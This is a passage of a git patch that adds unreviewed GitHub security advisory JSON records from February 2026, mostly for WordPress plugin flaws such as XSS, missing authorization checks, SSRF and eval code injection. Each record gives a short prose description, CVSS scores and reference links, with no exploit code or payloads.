'funp_ajax_modify_notes' AJAX endpoint due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary notes that do not belong to them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12071" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/frontend-user-notes/tags/2.1.1/includes/ajax.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/30f2dd33-228d-4942-88d9-78c7ed0b79a1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:16Z" + } +} \ No newline at end of file From d6d6c974b5a7967b6140980bb26d7ef5c03f3d15 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 09:32:25 +0000 Subject: [PATCH 002/174] Publish Advisories GHSA-34f4-7p4v-274v GHSA-53pp-j4fh-wvrr GHSA-5c5v-f747-q7rq GHSA-6mq9-qm49-w244 GHSA-77g9-fwj8-pcwg GHSA-8425-76gw-qxj4 GHSA-8vw7-m4cj-2323 GHSA-9x54-6v7m-8wf2 GHSA-cwvx-vcjx-vqjc GHSA-cxr2-7xvc-hh42 GHSA-g6wj-gw42-4345 GHSA-gch6-cfhh-c44p GHSA-gmgx-8hxg-f53q GHSA-gxvp-w433-832f GHSA-h92c-7ccr-x4hr GHSA-jh7f-pj8r-h37c GHSA-p572-g32f-hp32 GHSA-q7cc-x725-hp7g GHSA-q7wp-4j7p-g4vj GHSA-qfwf-756h-2p4g GHSA-qj9g-q4j9-47hp GHSA-rg7x-c263-823c GHSA-wxhm-86c2-x66c GHSA-xf7v-j2cc-2crf --- .../GHSA-34f4-7p4v-274v.json | 48 ++++++++++++++ .../GHSA-53pp-j4fh-wvrr.json | 48 ++++++++++++++ .../GHSA-5c5v-f747-q7rq.json | 52 +++++++++++++++ .../GHSA-6mq9-qm49-w244.json | 56 ++++++++++++++++ .../GHSA-77g9-fwj8-pcwg.json | 48 ++++++++++++++ .../GHSA-8425-76gw-qxj4.json | 48 ++++++++++++++ .../GHSA-8vw7-m4cj-2323.json | 60 +++++++++++++++++ .../GHSA-9x54-6v7m-8wf2.json | 25 ++++++++ .../GHSA-cwvx-vcjx-vqjc.json | 48 ++++++++++++++ .../GHSA-cxr2-7xvc-hh42.json | 52 +++++++++++++++ .../GHSA-g6wj-gw42-4345.json | 48 ++++++++++++++ .../GHSA-gch6-cfhh-c44p.json | 48 ++++++++++++++ .../GHSA-gmgx-8hxg-f53q.json | 52 +++++++++++++++ .../GHSA-gxvp-w433-832f.json | 52 +++++++++++++++ .../GHSA-h92c-7ccr-x4hr.json | 52 +++++++++++++++ .../GHSA-jh7f-pj8r-h37c.json | 56 ++++++++++++++++ .../GHSA-p572-g32f-hp32.json | 56 ++++++++++++++++ .../GHSA-q7cc-x725-hp7g.json | 48 ++++++++++++++ .../GHSA-q7wp-4j7p-g4vj.json | 48 ++++++++++++++ .../GHSA-qfwf-756h-2p4g.json | 60 +++++++++++++++++ .../GHSA-qj9g-q4j9-47hp.json | 52 +++++++++++++++ .../GHSA-rg7x-c263-823c.json | 56 ++++++++++++++++ .../GHSA-wxhm-86c2-x66c.json | 44 +++++++++++++ .../GHSA-xf7v-j2cc-2crf.json | 64 +++++++++++++++++++ 24 files changed, 1221 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json create mode 100644 advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json diff --git a/advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json b/advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json new file mode 100644 index 0000000000000..d73bd87cbad3d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34f4-7p4v-274v", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2281" + ], + "details": "The Private Comment plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Label text' setting in all versions up to, and including, 0.0.4. This is due to insufficient input sanitization and output escaping on the plugin's label text option. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2281" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/private-comment/tags/0.0.3/private-comment.php#L128" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/private-comment/trunk/private-comment.php#L128" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458294/private-comment/trunk/private-comment.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/94d75f18-67ab-4367-982b-73e256d5dbe2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json b/advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json new file mode 100644 index 0000000000000..65896427e7875 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-53pp-j4fh-wvrr", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1656" + ], + "details": "The Business Directory Plugin for WordPress is vulnerable to authorization bypass due to a missing authorization check in all versions up to, and including, 6.4.20. This makes it possible for unauthenticated attackers to modify arbitrary listings, including changing titles, content, and email addresses, by directly referencing the listing ID in crafted requests to the wpbdp_ajax AJAX action.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1656" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.20/includes/helpers/class-authenticated-listing-view.php#L20" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/trunk/includes/helpers/class-authenticated-listing-view.php#L20" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3452627/business-directory-plugin/tags/6.4.21/includes/controllers/pages/class-submit-listing.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f894ce75-168c-4baa-8cae-d2e7f1a0a9ab?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json b/advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json new file mode 100644 index 0000000000000..e5228cf404a20 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5c5v-f747-q7rq", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1666" + ], + "details": "The Download Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirect_to' parameter in all versions up to, and including, 3.3.46. This is due to insufficient input sanitization and output escaping on the 'redirect_to' GET parameter in the login form shortcode. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1666" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.46/src/User/Login.php#L137" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.46/src/User/views/login-form.php#L142" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3455081%40download-manager%2Ftrunk&old=3440008%40download-manager%2Ftrunk&sfp_email=&sfph_mail=#file25" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb84ba3-b403-4a9d-b1a7-92aa947310ac?source=cve" + }, + { + "type": "WEB", + "url": "https://www.wpdownloadmanager.com/doc/short-codes/wpdm_login_form-user-login-form-short-code" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json b/advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json new file mode 100644 index 0000000000000..7aef7673f85d8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mq9-qm49-w244", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2127" + ], + "details": "The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to unauthorized arbitrary shortcode execution in all versions up to, and including, 1.70.4. This is due to a missing capability check on the `siteorigin_widget_preview_widget_action()` function which is registered via the `wp_ajax_so_widgets_preview` AJAX action. The function only verifies a nonce (`widgets_action`) but does not check user capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes by invoking the `SiteOrigin_Widget_Editor_Widget` via the preview endpoint. The required nonce is exposed on the public frontend when the Post Carousel widget is present on a page, embedded in the `data-ajax-url` HTML attribute.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2127" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/base/inc/actions.php#L6" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/base/inc/actions.php#L75" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/widgets/editor/editor.php#L120" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/widgets/post-carousel/post-carousel.php#L590" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3460939%40so-widgets-bundle%2Ftrunk&old=3434183%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bf92c64b-ca76-4af7-a1e4-585a60b03153?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json b/advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json new file mode 100644 index 0000000000000..e0d470e5fbab3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77g9-fwj8-pcwg", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1937" + ], + "details": "The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the `yaymail_import_state` AJAX action in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1937" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Models/MigrationModel.php#L143" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/trunk/src/Models/MigrationModel.php#L143" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3460087%40yaymail&new=3460087%40yaymail&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a17ded3-340d-494f-be7e-2550dab360bc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json b/advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json new file mode 100644 index 0000000000000..99a3c7283332e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8425-76gw-qxj4", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1857" + ], + "details": "The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.6.1. This is due to insufficient validation of the `endpoint` parameter in the `get_items()` function of the GetResponse REST API handler. The endpoint's permission check only requires `edit_posts` capability (Contributor role) rather than `manage_options` (Administrator). This makes it possible for authenticated attackers, with Contributor-level access and above, to make server-side requests to arbitrary endpoints on the configured GetResponse API server, retrieving sensitive data such as contacts, campaigns, and mailing lists using the site's stored API credentials. The stored API key is also leaked in the request headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1857" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/advanced-form/getresponse-rest-api.php#L57" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/advanced-form/getresponse-rest-api.php#L77" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3454881%40kadence-blocks%2Ftrunk&old=3453204%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ea8d38a-f5ce-40dd-a015-f56d60579e05?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json b/advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json new file mode 100644 index 0000000000000..5d13751701bc9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vw7-m4cj-2323", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2642" + ], + "details": "A security vulnerability has been detected in ggreer the_silver_searcher up to 2.2.0. The impacted element is the function search_stream of the file src/search.c. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2642" + }, + { + "type": "WEB", + "url": "https://github.com/ggreer/the_silver_searcher/issues/1558" + }, + { + "type": "WEB", + "url": "https://github.com/ggreer/the_silver_searcher" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0119/blob/main/segv1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346398" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346398" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752769" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json b/advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json new file mode 100644 index 0000000000000..a4b70b7c5882b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9x54-6v7m-8wf2", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-25421" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority. Collision with another CVE.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25421" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json b/advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json new file mode 100644 index 0000000000000..0c1143260740c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cwvx-vcjx-vqjc", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2019" + ], + "details": "The Cart All In One For WooCommerce plugin for WordPress is vulnerable to Code Injection in all versions up to, and including, 1.1.21. This is due to insufficient input validation on the 'Assign page' field which is passed directly to the eval() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute arbitrary PHP code on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2019" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-cart-all-in-one/tags/1.1.21/includes/frontend/sidebar-cart-icon.php#L245" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-cart-all-in-one/trunk/includes/frontend/sidebar-cart-icon.php#L245" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455202" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/25bdb89f-3478-4a1a-8bf0-46e88207eb21?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json b/advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json new file mode 100644 index 0000000000000..595643344c0d5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cxr2-7xvc-hh42", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1649" + ], + "details": "The Community Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ce_venue_name' parameter in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1649" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.7/community-events.php#L1403" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.7/community-events.php#L779" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/community-events/trunk/community-events.php#L1403" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456114%40community-events&new=3456114%40community-events&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c44232a9-7b97-449c-b584-ca3c26d63581?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json b/advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json new file mode 100644 index 0000000000000..29943494063e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6wj-gw42-4345", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1938" + ], + "details": "The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized license key deletion due to a missing authorization check on the `/yaymail-license/v1/license/delete` REST endpoint in versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to delete the plugin's license key via the '/yaymail-license/v1/license/delete' endpoint granted they can obtain the REST API nonce.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1938" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/License/RestAPI.php#L142" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/trunk/src/License/RestAPI.php#L142" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3460087" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ce57b12-2241-416b-b466-aa06ca8c7551?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json b/advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json new file mode 100644 index 0000000000000..fd16389e309a2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + 